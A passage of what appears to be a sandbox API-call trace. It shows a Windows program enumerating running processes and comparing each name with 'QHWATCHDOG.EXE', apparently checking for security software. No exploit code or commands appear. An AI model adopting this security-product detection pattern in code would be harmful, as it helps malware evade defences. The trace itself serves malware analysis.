CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.059] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.059] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.060] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.060] lstrlenW (lpString="svchost.exe") returned 11 [0163.060] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.060] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.060] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="taskhost.exe")) returned 1 [0163.061] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.061] lstrlenW (lpString="taskhost.exe") returned 12 [0163.061] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.061] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.061] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.062] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.062] lstrlenW (lpString="taskeng.exe") returned 11 [0163.062] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.062] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.062] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.063] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.063] lstrlenW (lpString="dwm.exe") returned 7 [0163.063] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.063] lstrcmpW (lpString1="DWM.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.063] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.064] lstrcpyW 
(in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.064] lstrlenW (lpString="explorer.exe") returned 12 [0163.064] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.064] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.064] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.065] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.065] lstrlenW (lpString="taskeng.exe") returned 11 [0163.065] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.065] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.065] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.065] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.065] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.065] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.066] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.066] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.066] lstrcpyW (in: 
lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.066] lstrlenW (lpString="taskhost.exe") returned 12 [0163.066] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.066] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.066] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.067] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.067] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.067] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.067] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.067] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.068] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.068] lstrlenW (lpString="tri.exe") returned 7 [0163.068] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.068] lstrcmpW (lpString1="TRI.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.068] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="navigation-jay.exe")) returned 1 [0163.068] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.069] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.069] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.069] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.069] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.069] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.069] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.069] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.069] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.069] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.070] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.070] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.070] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.070] lstrcmpW 
(lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.070] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.071] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.071] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.071] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.071] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.071] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.072] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.072] lstrlenW (lpString="isolation.exe") returned 13 [0163.072] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.072] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.072] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.073] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.073] lstrlenW (lpString="abc.exe") returned 7 [0163.073] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.073] 
lstrcmpW (lpString1="ABC.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.073] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.073] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.073] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.073] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.073] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.073] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.074] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.074] lstrlenW (lpString="english_performing.exe") returned 22 [0163.074] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.074] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.074] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.074] lstrcpyW (in: lpString1=0x18f6dc, 
lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.074] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.074] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.074] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.074] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.075] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.075] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.075] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.075] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.075] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.076] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.076] lstrlenW (lpString="volume.exe") returned 10 [0163.076] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.076] lstrcmpW (lpString1="VOLUME.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="rich-zealand.exe")) returned 1 [0163.076] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.076] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.076] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.076] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.077] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.077] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.077] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.077] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.077] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.078] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.078] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.078] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.078] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.078] 
Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.079] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.079] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.079] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.079] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.079] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.079] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.079] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.079] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.079] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.079] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.080] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.120] lstrlenW (lpString="EXCEL.EXE") 
returned 9 [0163.120] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.120] lstrcmpW (lpString1="EXCEL.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.120] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.121] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.121] lstrlenW (lpString="svchost.exe") returned 11 [0163.121] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.121] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.121] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.122] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.122] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.122] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.122] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.122] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.123] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.123] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.123] CharUpperBuffW (in: 
lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.123] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.123] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.124] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.124] lstrlenW (lpString="svchost.exe") returned 11 [0163.124] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.124] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.124] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.124] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.124] lstrlenW (lpString="svchost.exe") returned 11 [0163.124] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.124] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.124] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.125] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.125] lstrlenW (lpString="winpoint.exe") returned 12 [0163.125] CharUpperBuffW (in: lpsz="winpoint.exe", 
cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.125] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.125] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.126] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.126] lstrlenW (lpString="cmd.exe") returned 7 [0163.126] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.126] lstrcmpW (lpString1="CMD.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.126] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.127] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.127] lstrlenW (lpString="conhost.exe") returned 11 [0163.127] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.127] lstrcmpW (lpString1="CONHOST.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.127] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.128] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.128] lstrlenW (lpString="PING.EXE") returned 8 [0163.128] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") 